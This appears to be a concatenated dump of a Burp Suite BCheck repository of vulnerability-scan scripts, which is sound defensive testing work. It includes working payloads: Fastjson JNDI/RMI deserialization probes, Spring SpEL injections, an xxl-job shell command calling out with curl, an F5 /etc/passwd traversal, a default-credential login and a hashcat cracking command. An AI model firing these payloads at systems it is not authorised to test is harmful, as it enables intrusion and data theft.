23 | end if 24 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot heapdump actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot heapdump actuator" 4 | description: "Springboot heapdump actuator provides a heap dump from the application's JVM" 5 | author: "psytester" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/heapdump", 11 | "/actuator/heapdump", 12 | "/api/actuator/heapdump" 13 | 14 | given host then 15 | send request called check: 16 | method: "GET" 17 | path: {potential_path} 18 | 19 | if {check.response.status_code} is "200" 20 | and "application/octet-stream" in {check.response.headers} then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: `Springboot heapdump actuator found at {potential_path}.` 25 | remediation: "Ensure heapdump actuator is not exposed." 26 | end if 27 | -------------------------------------------------------------------------------- /other/SAP Directory Listing.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SAP Directory Listing" 4 | author: "Parimal Shaw" 5 | description: "Within SAP NetWeaver, directory listing is enabled." 
6 | tags: "SAP NetWeaver Misconfiguration" 7 | 8 | define: 9 | potential_path = "/irj/go/km/navigation/" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | 18 | if {check.response.status_code} is "200" 19 | and "title=\"~system\"" in {check.response.body} 20 | and "NetWeaver" in {check.response.body} 21 | and "text/html" in {check.response.headers} then 22 | report issue: 23 | severity: medium 24 | confidence: certain 25 | detail: "In SAP NetWeaver the directory listing is enabled or not configured properly." 26 | remediation: "Ensure to Disable directory listing." 27 | end if -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.43-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.43 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"rand1":"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 21 | remediation: "https://paper.seebug.org/1192/." 
22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /examples/README.md: -------------------------------------------------------------------------------- 1 | # BCheck examples 2 | 3 | ## Blind SSRF with out-of-band detection 4 | 5 | Uses collaborator dynamically to detect server side request forgery. 6 | 7 | ## Exposed backup file 8 | 9 | Identifies if backup files are exposed. 10 | 11 | ## Exposed git directory 12 | 13 | Identifies if a git directory is present under the web root. 14 | 15 | ## Leaked AWS Tokens 16 | 17 | Observes responses passively and uses regular expressions to identify if AWS tokens are being leaked. 18 | 19 | ## Log4Shell 20 | 21 | Uses collaborator dynamically to detect vulnerability to CVE-2021-44228 via exploitation. 22 | 23 | ## Server Side Prototype Pollution 24 | 25 | Uses a mixture of response matching and dynamic requests to detect the presence of server side prototype pollution. 26 | 27 | ## Suspicious Input Transformation 28 | 29 | Uses a hueristic to detect transformed inputs which are an indicator of possible server-side code injection. 
30 | 31 | -------------------------------------------------------------------------------- /other/files/configs/WordPress-ReadMe.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "WordPress README file Exposure" 4 | description: "Tests for WordPress README file exposed" 5 | author: "r3dg33k" 6 | tags: "exposure", "php", "wordpress" 7 | 8 | run for each: 9 | # you could add more values to this list to make the check repeat 10 | potential_path = 11 | "/readme.html", 12 | "/wp/readme.html", 13 | "/blog/wp/readme.html" 14 | 15 | given host then 16 | send request called check: 17 | method: "GET" 18 | path: {potential_path} 19 | 20 | if "First Things First" in {check.response.body} and {check.response.status_code} is "200" then 21 | report issue: 22 | severity: info 23 | confidence: certain 24 | detail: `WordPress README file found at {potential_path}.` 25 | remediation: "Ensure WordPress is hardened." 26 | end if 27 | -------------------------------------------------------------------------------- /other/files/npm-debug-log.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NPM Debug Log Files" 4 | description: "Checks for NPM debug log files in current path as opposed to just root directory of site." 
5 | author: "@puzzlepeaches" 6 | tags: "npm", "log", "exposure", "error" 7 | 8 | run for each: 9 | potential_path = 10 | "/npm-debug.log", 11 | "/assets/npm-debug.log" 12 | 13 | 14 | given request then 15 | send request called check: 16 | method: "GET" 17 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 18 | 19 | if {check.response.body} matches "verbose cli" or 20 | {check.response.body} matches "verbose stack" and 21 | {check.response.status_code} is "200" then 22 | report issue: 23 | severity: low 24 | confidence: tentative 25 | detail: `NPM debug log file found at {potential_path}.` 26 | end if 27 | 28 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.67-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.67 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":\{"@type":"java.util.Properties","UserTransaction":"rmi://{generate_collaborator_address()}/{random_str(4)}"}}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 21 | remediation: "https://paper.seebug.org/1192/." 
22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-22963-spring_cloud_function_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-22963 Spring Cloud Function RCE" 4 | description: "find CVE-2022-22963 Spring Cloud Function RCE " 5 | author: "timeshatter" 6 | tags: "Spring Cloud Function RCE","CVE-2022-22963" 7 | 8 | define: 9 | collaborator_address = {generate_collaborator_address()} 10 | poc = `new java.net.InetSocketAddress('{collaborator_address}',80)` 11 | 12 | given host then 13 | send request: 14 | method: "POST" 15 | path: "/functionRouter" 16 | body: "test" 17 | headers: 18 | "spring.cloud.function.routing-expression": {poc} 19 | 20 | if any interactions then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: "find CVE-2022-22963 Spring Cloud Function RCE" 25 | remediation: "update Spring Cloud Function." 
26 | end if 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2021-20323 keycloak xss.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2021-20323" 4 | description: "KeyCloak Post-Based reflected XSS | CVE-2021-20323" 5 | author: "Milad Fadavvi" 6 | tags: "injection,xss,rxss" 7 | 8 | run for each: 9 | potential_path = "/auth/realms/master/clients-registrations/openid-connect" 10 | 11 | given host then 12 | send request called check: 13 | method: "POST" 14 | path: {potential_path} 15 | body: "{\"\":1}" 16 | headers: "Content-type": "application/json" 17 | 18 | if "alert('Bo0oq')" in {check.response.body} and "org.keycloak" in {check.response.body} 19 | then 20 | report issue: 21 | severity: medium 22 | confidence: certain 23 | detail: `https://nvd.nist.gov/vuln/detail/CVE-2021-20323` 24 | remediation: "Update the KeyCloak!" 25 | end if 26 | -------------------------------------------------------------------------------- /other/files/configs/web-config.discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "web.config file exposure" 4 | description: "IIS Web configuration file was detected." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "web", "config", "iis" 7 | 8 | run for each: 9 | potential_path = 10 | "/web.config", 11 | "/app/web.config", 12 | "/../../web.config" 13 | 14 | given request then 15 | send request called check: 16 | method: "GET" 17 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 18 | 19 | if {check.response.status_code} is "200" and 20 | {check.response.body} matches "" and {check.response.body} matches "" then 21 | report issue: 22 | severity: low 23 | confidence: certain 24 | detail: `IIS Web configuration file was detected at {check.response.url}` 25 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2025-29927-Next-js-middleware-bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2025-29927 Next.js Middleware Bypass" 4 | description: "Next.js Detected, possible vulnerability" 5 | author: "Paul Schmelzel" 6 | tags: "CVE-2025-29927","Next.js","Nextjs","Bypass" 7 | 8 | given request then 9 | send request: 10 | headers: 11 | "x-nextjs-data": "1" 12 | 13 | if {latest.response.headers} matches "x-nextjs-rewrite:" then 14 | report issue: 15 | severity: medium 16 | confidence: firm 17 | detail: "The site is using NextJS and may be vulnerble to a bypass as described in CVE-2025-29927. See https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/ for further exploit details." 18 | remediation: "Do not accept headers from users such as x-nextjs-data or x-middleware-subrequest." 
19 | end if 20 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.47-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.47 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"a":\{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":\{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}}` 10 | 11 | 12 | given request then 13 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 14 | send request: 15 | body: {payload} 16 | 17 | if dns interactions then 18 | report issue: 19 | severity: high 20 | confidence: certain 21 | detail: "https://paper.seebug.org/1192/." 22 | remediation: "https://paper.seebug.org/1192/." 23 | end if 24 | end if 25 | -------------------------------------------------------------------------------- /other/prometheus/unauth-access-to-prometheus-server.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Unauthenticated Access to Prometheus (passive)" 4 | description: "Check if the Prometheus Server is publicly accessible." 5 | author: "@nightshiba" 6 | tags: "passive" 7 | 8 | given response then 9 | if {latest.response.status_code} is "200" 10 | and ({latest.response.body} matches "Prometheus Time Series Collection and Processing Server" 11 | or ({latest.response.body} matches "Metrics'" and {latest.response.body} matches "Exporter")) then 12 | report issue: 13 | severity: medium 14 | confidence: certain 15 | detail: "The Prometheus Server is publicly accessible without any authentication. 
This can lead to sensitive data exposure." 16 | remediation: "Ensure that the Prometheus Server is not publicly accessible and is properly secured." 17 | end if 18 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-5902 F5 Networks Authentication Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2020-5902 F5 Networks Authentication Bypass" 4 | description: "Checks for CVE-2020-5902" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2020-5902 CVE" 7 | 8 | run for each: 9 | potential_path = 10 | "tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", 11 | "hsqldb;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | # Checks that we get a 200 AND that the output we expect in the result 19 | if {check.response.status_code} is "200" and "root:" in {check.response.body} then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "Host is vulnerable to the authentication bypass vulnerability CVE-2020-5902" 24 | remediation: "Patch to a non vulnerable version" 25 | end if 26 | -------------------------------------------------------------------------------- /other/MsExchange-ECP-Admin-Accessible.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Microsoft Exchange Admin Center Exposure" 4 | description: "Tests for MS Exchnage Admin Center exposure" 5 | author: "r3dg33k" 6 | tags: "msexchange", "ecp", "admin-panel" 7 | 8 | run for each: 9 | # you could add more values to this list to make the check repeat 10 | potential_path = "/ecp" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "Object moved" in 
{check.response.body} and 18 | {check.response.status_code} is "302" then 19 | report issue: 20 | severity: low 21 | confidence: certain 22 | detail: `Microsoft Exchange Admin Center Login Page found at {potential_path}.` 23 | remediation: "Block access to the EAC based on IP Address. https://social.technet.microsoft.com/wiki/contents/articles/52076.exchange-2016-restrict-access-to-the-eac-in-iis.aspx" 24 | end if 25 | -------------------------------------------------------------------------------- /other/tokens/jwt-hmac-alg-detected.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "HMAC-Signed JWT Identified" 4 | description: "Detects JWTs using HMAC signing in responses" 5 | author: "Paul Schmelzel" 6 | tags: "passive", "jwt", "hmac", "hashcat" 7 | 8 | given response then 9 | if {latest.response} matches "(eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9|eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9|eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9|eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9|eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzM4NCJ9|eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9|eyJhbGciOiJIUzI1NiJ9|eyJhbGciOiJIUzM4NCJ9|eyJhbGciOiJIUzUxMiJ9)" then 10 | report issue: 11 | severity: info 12 | confidence: certain 13 | detail: "JWT using HMAC (HS256 / HS384 / HS512) detected in response. You can submit this JWT to hashcat for cracking using `hashcat -a 0 -m 16500 `" 14 | remediation: "Avoid using HMAC (symmetric) signing algorithms for JWTs in security-sensitive applications." 
15 | end if 16 | 17 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-1273-spring_data_commons_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2018-1273 Spring Data Commons RCE" 4 | description: "Spring Data Commons RCE (CVE-2018-1273)" 5 | author: "timeshatter" 6 | tags: "Spring Data Commons RCE","CVE-2018-1273" 7 | 8 | define: 9 | poc="[#this.getClass().forName('org.springframework.web.context.request.RequestContextHolder').getRequestAttributes().getResponse().addHeader('vuln', 'True')]" 10 | answer="vuln: True" 11 | 12 | given request then 13 | send request: 14 | replacing body: {regex_replace({base.request.body},"(\w+)=",`$1{poc}=`)} 15 | 16 | if {answer} in {latest.response} then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "The application transforms input in a way that suggests it might be 21 | vulnerable to Spring Data Commons RCE (CVE-2018-1273)." 22 | remediation: "Manual investigation is advised." 
23 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-35078 Ivanti EPMM Unauthenticate Access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Ivanti API Unauthenticated Access" 4 | description: "Ivanti Endpoint Manager Mobile (EPMM) - Unauthenticated Access" 5 | author: "Dolph Flynn" 6 | tags: "Ivanti", "Unauthenticated Access", "CVE-2023-35078" 7 | 8 | 9 | given host then 10 | send request called check: 11 | method: "GET" 12 | path: "/mifs/aad/api/v2/admins/users" 13 | 14 | if {check.response.status_code} is "200" and 15 | {check.response.headers} matches "application/json" and 16 | "name" in {check.response.body} and 17 | "results" in {check.response.body} and 18 | "userId" in {check.response.body} 19 | then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "Ivanti EPMM API unauthenticated access (CVE-2023-35078) detected." 24 | remediation: "Apply vendor patch to fix vulnerability." 
25 | end if 26 | 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2020-1957 Shiro AuthBypass" 4 | description: "AuthBypass CVE-2020-1957" 5 | author: "timeshatter" 6 | tags: "Shiro", "AuthBypass CVE-2020-1957", "active" 7 | 8 | given request then 9 | if not ({base.response.status_code} is "200") then 10 | send request called check: 11 | replacing headers: 12 | "Cookie": "rememberMe=1" 13 | 14 | if "rememberMe=deleteMe" in {check.response} then 15 | send request called auth_pass_check: 16 | replacing path: `/xxx/..;{base.request.url.path}` 17 | 18 | if {auth_pass_check.response.status_code} is "200" then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "find shiro AuthBypass CVE-2020-1957" 23 | remediation: "update shiro to last." 24 | end if 25 | end if 26 | end if -------------------------------------------------------------------------------- /other/xxl-job/xxl_job_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "xxl job rce" 4 | description: "xxl job rce detection" 5 | author: "timeshatter" 6 | tags: "xxl job" 7 | 8 | define: 9 | poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}` 10 | 11 | given host then 12 | send request: 13 | method: "POST" 14 | path: "/run" 15 | headers: 16 | "Content-Type": "application/json" 17 | body: {poc} 18 | 19 | if any interactions then 20 | report issue: 21 | severity: high 22 | confidence: 
certain 23 | detail: "xxl job rce detection." 24 | remediation: "Turn on the authentication component that comes with XXL-JOB." 25 | end if 26 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-22965-spring_data_binding_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-22965 Spring Data Binding RCE" 4 | description: "find CVE-2022-22965 Spring Data Binding RCE" 5 | author: "timeshatter" 6 | tags: "Spring Data Binding RCE","CVE-2022-22965" 7 | 8 | define: 9 | poc = "class.module.classLoader.URLs%5B0%5D=0" 10 | poctest = "class.module.classLoader.vulntest=1" 11 | 12 | given request then 13 | send request called check : 14 | appending queries: {poc} 15 | 16 | if {check.response.status_code} is "400" then 17 | send request called check2 : 18 | appending queries: {poctest} 19 | 20 | if {check2.response.status_code} is {base.response.status_code} then 21 | report issue: 22 | severity: high 23 | confidence: tentative 24 | detail: "find CVE-2022-22965 Spring Data Binding RCE" 25 | remediation: "update Spring Data Binding." 
        end if
    end if

--------------------------------------------------------------------------------
/other/springboot/Springboot logfile actuator.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check: probes two candidate locations of the Spring Boot
# logfile actuator and reports when a plain-text, log-looking body comes back.
metadata:
    language: v1-beta
    name: "Springboot logfile actuator"
    description: "Springboot logfile actuator exposed and may expose sensitive information"
    author: "Mateusz Dabrowski (dbrwsky)"
    tags: "actuator", "springboot", "exposure", "informative"

run for each:
    # Each path is requested once per host.
    potential_path =
        "/logfile",
        "/actuator/logfile"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # All four conditions must hold: 200, two log markers in the body
    # ("[main]" and "INFO"), and a text/plain content type.
    if {check.response.status_code} is "200"
    and "[main]" in {check.response.body}
    and "INFO" in {check.response.body}
    and "text/plain" in {check.response.headers} then
        report issue:
            severity: low
            confidence: certain
            detail: `Springboot logfile actuator found at {potential_path}.`
            remediation: "Ensure logfile actuator is not exposed and doesn't contain sensitive information."
    end if

--------------------------------------------------------------------------------
/other/APIs/couchbase-unauth-apis.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for the Couchbase buckets REST endpoint answering
# without authentication.
metadata:
    language: v2-beta
    name: "Couchbase Buckets Unauthenticated REST API - Detect"
    description: "Couchbase Buckets REST API without authentication was detected"
    author: "Nithissh"

run for each:
    # you could add more values to this list to make the check repeat
    potential_path =
        "/pools/default/buckets"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Requires a 200 JSON body containing all three markers; "data" and
    # "bucket" are fairly generic on their own, "couchbase" carries the signal.
    if {check.response.status_code} is "200"
    and "couchbase" in {check.response.body}
    and "bucket" in {check.response.body}
    and "data" in {check.response.body}
    and "application/json" in {check.response.headers} then
        report issue:
            severity: medium
            confidence: certain
            remediation: "Public access should be revoked"
            detail: `Couchbase bucket publicly exposed on {potential_path}.`
    end if

--------------------------------------------------------------------------------
/other/nacos/Nacos-default-password.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check: submits the documented default Nacos credentials to
# the login endpoint and reports when a token is issued.
metadata:
    language: v1-beta
    name: "Nacos default password"
    description: "Nacos Default Password"
    tags: "Unauthorized","Nacos","DefaultPassword"
    author: "JaveleyQAQ"

define:
    # Form-encoded login body; sent verbatim as the POST body below.
    data = "username=nacos&password=nacos"

run for each:
    # Login endpoint with and without the /nacos context path.
    nacos_detect =
        "/nacos/v1/auth/users/login",
        "/v1/auth/users/login"

given host then
    send request called nacos:
        method: "POST"
        path: {nacos_detect}
        headers:
            "Content-Type": "application/x-www-form-urlencoded"
        appending body: {data}
    # A successful login is recognised by a 200, an accessToken field in the
    # body and an Authorization response header.
    if {nacos.response.status_code} is "200" and "\"accessToken\":" in {nacos.response.body} and "Authorization" in {nacos.response.headers} then
        report issue:
            severity: high
            confidence: certain
            detail: `Nacos Default User: nacos/nacos`
            remediation: "Change your password"
    end if

--------------------------------------------------------------------------------
/other/tokens/aws-access-secret-key.bcheck:
--------------------------------------------------------------------------------
# Passive check over every response (headers and body, since {latest.response}
# is matched as a whole) for AWS credential-looking key/value pairs.
metadata:
    language: v1-beta
    name: "AWS Access/Secret Key Disclosure"
    description: "Looks for AWS Access/Secret Key in page source."
    author: "@puzzlepeaches"
    tags: "disclosure", "aws", "generic", "exposure", "amazon"

given response then
    # The secret-key branch is tested first; because of the "else if", a
    # response containing both a secret key and an access key ID yields a
    # single (secret key) finding rather than two.
    if {latest.response} matches "(?:\"|')?AWS_SECRET_ACCESS_KEY(?:\"|')?\\s*:\\s*(?:\"|')?[A-Za-z0-9\\/+=]{40}(?:\"|')?" then
        report issue:
            severity: low
            confidence: tentative
            detail: "AWS Access/Secret Key found in page."
            remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source."
    else if {latest.response} matches "(?:\"|')?AWS_ACCESS_KEY_ID(?:\"|')?\\s*:\\s*(?:\"|')?[A-Z0-9]{20}(?:\"|')?" then
        report issue:
            severity: low
            confidence: tentative
            detail: "AWS Access Key ID found in page."
            remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source."
    end if

--------------------------------------------------------------------------------
/other/SAP/SAP authentication bypass check.bcheck:
--------------------------------------------------------------------------------
# Active, host-level check for the public SAP admin page described in
# SAP Note 2258786.
metadata:
    language: v1-beta
    name: "SAP authentication bypass check"
    description: "Tests for Sap authentication bypass SAP Note 2258786 Checking if the public
    endpoint of sap/admin/public is accessible which would leak the patch management and internal urls"
    author: "Bob van der Staak"
    tags: "SAP", "Authentication Bypass"

run for each:
    potential_path =
        "/sap/admin/public/index.html"


given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Only a 200 whose body contains "Administration" is reported; no
    # content-type check, so a generic HTML page containing that word on a
    # catch-all route would also match.
    if "Administration" in {check.response.body} and {check.response.status_code} is "200" then
        report issue:
            severity: medium
            confidence: certain
            detail: `Sap information leaking found at the following path {potential_path}.`
            remediation: "Follow the actions which are required in SAP Note 2258786"
    end if


--------------------------------------------------------------------------------
/other/fastjson/Fastjson-1.2.42-Deserialization-RCE.bcheck:
--------------------------------------------------------------------------------
# Active, request-level check: for JSON requests, replaces the body with a
# Fastjson autoType probe pointing at a Collaborator address and reports on
# DNS interaction.
metadata:
    language: v1-beta
    name: "Fastjson 1.2.42 Deserialization RCE"
    description: "https://paper.seebug.org/1192/"
    author: "Javeley"
    tags: "Fastjson", "Deserialization","RCE","Alibaba"

define:
    # payload = `\{"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/a","autoCommit":true}`
    # Leading "\{" escapes the brace so it is not treated as interpolation.
    payload = `\{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}", "autoCommit":true}`

given request then

    # Gate: only requests whose body starts with "{" and that declare a JSON
    # content type are probed, which keeps the check off form/HTML traffic.
    if {base.request.body} matches "^[{]" and
    "application/json" in {base.request.headers} then
        send request:
            body: {payload}

        # NOTE(review): detail and remediation are bare URLs; a reader of the
        # issue gets no description of the finding or of the fix (upgrade
        # Fastjson / keep autoType disabled). Consider descriptive text with
        # the reference appended.
        if dns interactions then
            report issue:
                severity: high
                confidence: certain
                detail: "https://paper.seebug.org/1192/."
                remediation: "https://paper.seebug.org/1192/."
        end if
    end if

--------------------------------------------------------------------------------
/examples/suspicious-input-transformation.bcheck:
--------------------------------------------------------------------------------
# Insertion-point-level example: appends a template-style arithmetic
# expression to each insertion point and looks for its evaluated value.
metadata:
    language: v1-beta
    name: "Insertion-point-level"
    description: "Inserts a calculation into each parameter to detect suspicious input transformation"
    author: "Carlos Montoya"

define:
    calculation = "{{1337*1337}}"
    # 1337*1337; only appears in a response if the input was evaluated.
    answer = "1787569"

# we will automatically insert into nested insertion points
given insertion point then
    # prevent false positives by checking answer isn't
    # already in base response
    if not({answer} in {base.response}) then
        send payload:
            appending: {calculation}

        if {answer} in {latest.response} then
            report issue:
                severity: high
                confidence: tentative
                detail: "The application transforms input in a way that suggests it might be
                vulnerable to some kind of server-side code injection."
                remediation: "Manual investigation is advised."
        end if
    end if

--------------------------------------------------------------------------------
/other/JavaScript/malicious_javascript_imported.bcheck:
--------------------------------------------------------------------------------
# Inspired by KnugiHK's 'Malicious Polyfill CDN In Use' BCheck
# Uses domains highlighted by https://sansec.io/research/polyfill-supply-chain-attack:
# polyfill.io, bootcdn.net, bootcss.com, staticfile.net, staticfile.org, unionadjs.com, xhsbpza.com, union.macoms.la, newcrbpc.com

metadata:
    language: v2-beta
    name: "Malicious JavaScript import in use"
    description: "Inspects HTML responses for script tags that reference domains known to serve malware"
    author: "Dolph Flynn"
    tags: "passive", "javascript"

given response then

    # NOTE(review): the body pattern below is an empty string as rendered on
    # this page. That is almost certainly an extraction artefact (a pattern
    # starting with a script tag would be swallowed by an HTML renderer) —
    # confirm against the source file. As written, "" matches every HTML
    # response and this would raise a high/firm finding on every page; the
    # pattern should match a script src attribute whose host is one of the
    # domains listed in the header comment.
    if {latest.response.headers} matches "text/html" and
    {latest.response.body} matches "" then
        report issue:
            severity: high
            confidence: firm
            detail: "JavaScript loaded from malicious domain."
    end if

--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2017-8046-spring_data_rest_rce.bcheck:
--------------------------------------------------------------------------------
# Active, request-level check for CVE-2017-8046: sends a JSON Patch whose path
# contains a SpEL expression that adds a marker response header, and reports
# when that header is observed.
metadata:
    language: v1-beta
    name: "CVE-2017-8046 Spring Data Rest RCE"
    description: "Spring Data Rest RCE (CVE-2017-8046)"
    author: "timeshatter"
    tags: "Spring Data Rest RCE","CVE-2017-8046"

define:
    # The SpEL only sets a response header ("vuln: True"); it does not run
    # commands, which is why the marker is a safe proof.
    poc="[{ \"op\": \"replace\", \"path\": \"{T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader('vuln', 'True')}/aa\", \"value\": \"aaa\" }]"
    answer="vuln: True"

# NOTE(review): there is no gate on the base request, so a PATCH is sent for
# every in-scope request. Restricting this to JSON/REST-looking requests (as
# the Fastjson checks do with a content-type test) would cut the noise.
given request then
    send request:
        method: "PATCH"
        headers:
            "Content-Type":"application/json-patch+json"
        body: {poc}

    if {answer} in {latest.response} then
        report issue:
            severity: high
            confidence: certain
            detail: "The application transforms input in a way that suggests it might be
            vulnerable to Spring Data Rest RCE(CVE-2017-8046)."
            remediation: "Manual investigation is advised."
    end if

--------------------------------------------------------------------------------
/other/files/ruby-on-rails-storage.bcheck:
--------------------------------------------------------------------------------
# Active, request-level check that requests storage.yml at several locations
# relative to the base request's directory.
metadata:
    language: v1-beta
    name: "Ruby on Rails storage.yml File Disclosure"
    description: "Checks for Ruby on Rails storage.yml file disclosure."
    author: "@puzzlepeaches"
    tags: "ruby", "storage", "exposure", "rails"

run for each:
    potential_path =
        "/storage.yml",
        "/config/storage.yml",
        "/ruby/config/storage.yml",
        "/railsapp/config/storage.yml"


given request then
    send request called check:
        method: "GET"
        # Inner regex_replace strips scheme and host (everything up to the
        # third "/"); the outer one drops the last path segment, leaving the
        # directory the base request lives in.
        replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}`

    # NOTE(review): "or" and "and" are mixed without parentheses. If "and"
    # binds tighter (the usual convention), any body containing "service:"
    # is reported regardless of status code or content type. Wrapping the
    # two body matches in parentheses makes the intent explicit:
    #   if ({check.response.body} matches "service:" or {check.response.body} matches "local:") and ...
    # Also note this issue has no remediation field.
    if {check.response.body} matches "service:" or
    {check.response.body} matches "local:" and
    {check.response.status_code} is "200" and
    not({check.response.headers} matches "text/html" or {check.response.headers} matches "application/json") then
        report issue:
            severity: low
            confidence: firm
            detail: `Ruby on Rails storage.yml file disclosure.`
